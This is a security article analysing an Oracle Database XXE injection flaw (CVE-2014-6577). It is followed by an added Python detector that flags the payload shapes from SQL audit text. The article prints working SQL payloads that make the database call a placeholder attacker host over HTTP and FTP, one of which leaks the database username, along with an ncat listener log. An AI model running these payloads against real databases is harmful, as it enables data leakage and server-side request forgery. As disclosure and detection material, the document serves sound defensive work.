In this article we analyze the Oracle Database XXE injection vulnerability (CVE-2014-6577), for which Oracle released patches on January 20.
For background on XXE, see the other Security Pulse article, "Unknown attack to know how to prevent -- XXE loopholes defense."
Vulnerability Description
The XML parser module of Oracle Database is vulnerable to XML External Entity (XXE) injection.
Affected versions: 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2
Required privilege: CREATE SESSION
Technical Details
Because of the security features of Oracle's XML parser, external entities are resolved, but their content is not fetched and expanded into the document.
This blocks some XXE injection attacks, such as reading local files on the remote database server.
However, an attacker can send a specially crafted SQL query that triggers the XML parser and tricks the server into connecting to a remote resource over HTTP or FTP.
This can result in data leakage over out-of-band channels, port scanning of internal systems reachable from the database server, server-side request forgery (SSRF) attacks, or denial of service (DoS).
Vulnerable URI Handler:
0x01
Oracle's XML parser can be triggered by invoking the EXTRACTVALUE() function on an XMLTYPE object. Here is a simple example that builds a query around a basic XXE injection payload:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'||'&'||'xxe;'),'/l') from dual;
Executing the above query statement will cause the following error:
ORA-31001: Invalid resource handle or path name "/etc/passwd"
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31001. 00000 - "Invalid resource handle or path name \"%s\""
*Cause: An invalid resource handle or path name was passed to
the XDB hierarchical resolver.
*Action: Pass a valid resouce handle or path name to the hierarchical
resolver.
This is because the file URI handler is mapped to an XDB repository path, which the XDB hierarchical resolver then rejects.
0x02
Switching the query to the HTTP URI handler runs into a different problem. The sample query is as follows:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://IP/test">]>'||'&'||'xxe;'),'/l') from dual;
The database server error is as follows:
ORA-31020: The operation is not allowed, Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.
This error shows that the XML parser does recognize the FTP and HTTP URI handlers. Note, however, that the above query does not send any HTTP request to the attacker's system.
0x03
Let's look at another XXE injection payload, this time referencing a parameter entity instead of a general entity:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>'),'/l') from dual;
The database server returns the same error (ORA-31020) when executing this query. This time, however, the server is successfully tricked into issuing an HTTP request for the resource "test". The following is the HTTP log on the attacker's server:
ncat -lvp 80
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8
Traditionally, to force the server to send HTTP requests to an external resource, an attacker would need execute permission on the UTL_HTTP package. Because EXTRACTVALUE() is available to every database user, XXE injection provides another way to trigger out-of-band HTTP requests, and this method does not require that permission.
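As an added example (not code from the original article and not Oracle's own tooling), here is a small Python detector that a DBA or SOC engineer could run over captured SQL text, such as statements pulled from an audit trail, to flag the payload shapes shown in 0x01 through 0x04. It joins string literals split with '||' before matching, so the '||'&'||' trick used in the payloads above does not hide the entity reference, and it distinguishes a referenced parameter entity (the shape that actually made the server connect out) from a general entity or a file: URI. The audit source, the "IP" placeholder and the sample statements are assumptions constructed for the example; it generalizes beyond the page by also accepting PUBLIC entities and https URIs.

```python
"""Flag Oracle SQL statements carrying XXE payloads aimed at EXTRACTVALUE()/XMLTYPE().
Added example for this article (not code from the original post or from Oracle).
Input is assumed to be raw SQL text, one statement per entry, e.g. pulled from an
audit trail (a hypothetical source)."""

import re
from dataclasses import dataclass

# 'abc'||'def' -> 'abcdef'. The article's payloads split the ampersand out as
# '||'&'||' to dodge SQL*Plus substitution, so the entity reference only
# becomes visible once adjacent string literals are joined.
CONCAT_RE = re.compile(r"'\s*\|\|\s*'")

# <!ENTITY name SYSTEM "uri"> or <!ENTITY % name SYSTEM "uri"> (PUBLIC "id" "uri" too)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[A-Za-z_][\w.-]*)\s+"
    r'(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]*)"',
    re.IGNORECASE,
)
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
TRIGGER_RE = re.compile(r"\b(extractvalue|xmltype)\s*\(", re.IGNORECASE)
NETWORK_SCHEMES = {"http", "https", "ftp"}


@dataclass
class Finding:
    name: str         # entity name as declared
    parameter: bool   # True for a parameter entity (declared with '%')
    uri: str          # SYSTEM/PUBLIC URI as written (may embed SQL such as ||user||)
    scheme: str       # lower-case URI scheme, or "relative"
    referenced: bool  # &name; or %name; actually appears in the document


def inspect_sql(sql: str) -> list[Finding]:
    """Return every external entity declared inside an EXTRACTVALUE/XMLTYPE call."""
    if not TRIGGER_RE.search(sql):
        return []
    doc = CONCAT_RE.sub("", sql)
    findings = []
    for m in ENTITY_RE.finditer(doc):
        name, uri = m.group("name"), m.group("uri")
        sm = SCHEME_RE.match(uri)
        scheme = sm.group(1).lower() if sm else "relative"
        ref = re.search(r"[&%]\s*" + re.escape(name) + r"\s*;", doc) is not None
        findings.append(Finding(name, m.group("param") is not None, uri, scheme, ref))
    return findings


def classify(sql: str) -> str:
    """Map a statement to the outcome the article reports for each payload shape:
    oob-request     - referenced parameter entity with http/ftp URI; the server
                      really connected out (sections 0x03 and 0x04)
    network-entity  - http/ftp URI in a general entity; ORA-31020, no request (0x02)
    local-resource  - file: URI, mapped to an XDB repository path; ORA-31001 (0x01)
    entity-declared - any other external entity declaration
    clean           - no external entity declared, or no EXTRACTVALUE/XMLTYPE call
    """
    findings = inspect_sql(sql)
    if not findings:
        return "clean"
    if any(f.scheme in NETWORK_SCHEMES and f.parameter and f.referenced for f in findings):
        return "oob-request"
    if any(f.scheme in NETWORK_SCHEMES for f in findings):
        return "network-entity"
    if any(f.scheme == "file" for f in findings):
        return "local-resource"
    return "entity-declared"


def scan(statements: list[str]) -> list[tuple[int, str]]:
    """(index, verdict) for every statement that is not clean."""
    hits = []
    for i, s in enumerate(statements):
        verdict = classify(s)
        if verdict != "clean":
            hits.append((i, verdict))
    return hits


# Constructed sample capture: a benign query followed by the article's four payload shapes.
SAMPLE_STATEMENTS = [
    "select extractvalue(xmltype('<a><b>1</b></a>'),'/a/b') from dual;",
    """select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'||'&'||'xxe;'),'/l') from dual;""",
    """select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://IP/test">]>'||'&'||'xxe;'),'/l') from dual;""",
    """select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>'),'/l') from dual;""",
    """select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "ftp://'||user||':<password>@IP/test">%remote; %param1;]>'),'/l') from dual;""",
]

if __name__ == "__main__":
    for i, verdict in scan(SAMPLE_STATEMENTS):
        print(f"statement {i}: {verdict}")
```

The verdicts mirror what the article observes: the general-entity HTTP payload is reported as "network-entity" because no request was seen for it, while the parameter-entity HTTP and FTP payloads are reported as "oob-request". Any "network-entity" or "oob-request" hit from an account that should never make the database reach out is worth correlating with outbound connections from the database host.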
0x04
The FTP URI handler (ftp:) can also be used to trigger the Oracle XML parser. The following query sends the database user name as the FTP user name:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "ftp://'||user||':<password>@IP/test">%remote; %param1;]>'),'/l') from dual;
The database server reports the following error (note that the error code differs from the ones above because the supplied credentials cannot be used to log on to the remote FTP server):
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:<password>@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.
As you can see, the database user name is included as an FTP user name in the FTP traffic sent to the attacker's server:
Oracle Database XXE Injection Vulnerability Analysis (cve-2014-6577)